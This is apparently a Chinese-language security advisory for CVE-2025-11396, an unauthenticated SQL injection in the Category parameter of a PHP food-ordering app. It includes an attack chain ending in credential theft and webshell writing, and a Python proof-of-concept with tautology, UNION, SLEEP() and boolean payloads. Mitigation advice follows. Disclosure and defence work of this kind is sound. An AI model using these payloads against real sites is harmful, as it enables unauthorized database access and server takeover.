CVE-2025-11396：Simple Food Ordering System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11396

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Food Ordering System

漏洞概述

CVE-2025-11396是code-projects公司开发的Simple Food Ordering System（简易食品订购系统）1.0版本中存在的一个高危SQL注入漏洞。该漏洞于2025年10月7日被公开披露，由vuldb.com的安全研究人员发现并报告。Simple Food Ordering System是一款用于管理食品订购业务流程的Web应用程序，提供了产品展示、分类管理、订单处理等功能。

该漏洞存在于应用程序的/product.php文件中，具体位于对Category参数的处理逻辑中。由于开发者未对用户输入的Category参数进行充分的过滤和参数化处理，攻击者可以通过构造恶意的SQL语句片段，将其注入到原本的数据库查询中，从而实现对后端数据库的未授权访问和操作。

根据CVSS 3.1评分标准，该漏洞的综合评分为7.3分，属于高危级别。漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），无需用户交互（UI:N），对机密性、完整性和可用性均存在低程度的影响（C:L/I:L/A:L）。这意味着该漏洞可以被远程攻击者轻易利用，且不需要任何身份认证或用户配合。由于漏洞的利用代码已经公开，潜在的安全风险较高，可能导致大量部署了该系统的Web服务器遭受攻击。

技术细节

该SQL注入漏洞的根本原因在于/product.php文件中对Category参数的处理缺乏安全防护。开发者很可能直接将用户提交的Category参数拼接到SQL查询语句中，而未采用预编译参数化查询（Prepared Statements）或输入验证机制。

漏洞利用的技术原理如下：

1. 攻击者通过HTTP请求向/product.php端点发送包含恶意SQL片段的Category参数。
2. 由于缺乏输入过滤和参数化处理，恶意SQL代码被直接拼接到后端数据库查询语句中。
3. 数据库引擎执行被注入的恶意SQL语句，攻击者可以绕过正常的查询逻辑。

利用方式方面，攻击者可以使用经典的SQL注入技术，如：
- 使用UNION SELECT语句提取数据库中的敏感信息（如管理员凭据、用户数据等）；
- 使用OR 1=1等永真条件绕过身份验证；
- 使用时间盲注（time-based blind injection）技术如SLEEP()函数进行数据提取；
- 利用堆叠查询（stacked queries）执行INSERT、UPDATE、DELETE等数据修改操作；
- 在某些配置环境下，利用LOAD_FILE()或INTO OUTFILE等MySQL函数进行文件读写操作。

由于该漏洞无需认证即可远程利用，且公开的PoC已经存在，任何具备基本SQL注入知识的攻击者都可以快速复现和利用该漏洞，对部署了该系统的服务器构成严重威胁。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者使用搜索引擎（如Shodan、Google Dorks）或扫描工具识别部署了Simple Food Ordering System 1.0的Web服务器，确定目标系统的/product.php端点。

STEP 2

步骤2：漏洞探测

攻击者向/product.php发送包含特殊字符（如单引号'）的Category参数，观察响应内容或服务器行为，判断是否存在SQL注入漏洞。

STEP 3

步骤3：注入Payload构造

攻击者根据数据库类型（推测为MySQL）构造相应的SQL注入Payload，包括UNION联合查询、时间盲注或布尔盲注等技术。

STEP 4

步骤4：数据提取

通过构造的注入Payload，攻击者逐步提取数据库中的敏感信息，包括管理员账户、密码哈希、用户个人信息等。

STEP 5

步骤5：权限提升与持久化

利用获取的管理员凭据登录系统后台，或通过SQL注入写入Webshell，实现对服务器的进一步控制和数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11396 - Simple Food Ordering System SQL Injection PoC
# Target: /product.php
# Vulnerable Parameter: Category
# Method: GET

import requests
import sys

TARGET_URL = "http://target.com/product.php"

# Basic SQL Injection payload to test the vulnerability
def test_sql_injection(target_url):
    """Test for SQL injection in the Category parameter"""
    
    # Payload 1: Basic error-based detection
    payload_error = "1' OR '1'='1"
    
    # Payload 2: UNION-based injection to extract data
    payload_union = (
        "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
    )
    
    # Payload 3: Time-based blind injection
    payload_time = "1' AND SLEEP(5)-- -"
    
    # Payload 4: Boolean-based blind injection
    payload_boolean = "1' AND 1=1-- -"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    print(f"[*] Testing SQL injection on: {target_url}")
    print(f"[*] Vulnerable parameter: Category")
    
    # Test with error-based payload
    params = {"Category": payload_error}
    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if "error" in response.text.lower() or "syntax" in response.text.lower():
            print("[!] Possible SQL injection detected (error-based)")
        
        # Check for time-based injection
        import time
        start_time = time.time()
        params_time = {"Category": payload_time}
        response_time = requests.get(target_url, params=params_time, headers=headers, timeout=15)
        elapsed = time.time() - start_time
        
        if elapsed >= 5:
            print(f"[!] Time-based SQL injection confirmed (delay: {elapsed:.2f}s)")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

# Example usage:
# python exploit.py http://vulnerable-site.com
if __name__ == "__main__":
    if len(sys.argv) > 1:
        test_sql_injection(sys.argv[1])
    else:
        test_sql_injection(TARGET_URL)

影响范围

code-projects Simple Food Ordering System 1.0

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署SQL注入防护规则，拦截包含常见SQL注入特征的请求；2）修改/product.php文件，对Category参数进行严格的输入过滤，仅允许字母数字和特定安全字符；3）将数据库查询改为预编译参数化查询；4）限制/product.php端点的访问权限，仅允许可信IP访问；5）监控数据库日志，及时发现异常的SQL查询行为；6）备份重要数据以防数据被篡改或删除。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11396
3 Details https://www.cvedetails.com/cve/CVE-2025-11396/
4 VulDB https://vuldb.com/cve/CVE-2025-11396
5 Link https://code-projects.org/
6 Link https://github.com/tiancesec/CVE/issues/6
7 Link https://vuldb.com/?ctiid.327333
8 Link https://vuldb.com/?id.327333
9 Link https://vuldb.com/?submit.665011
10 Link https://github.com/tiancesec/CVE/issues/6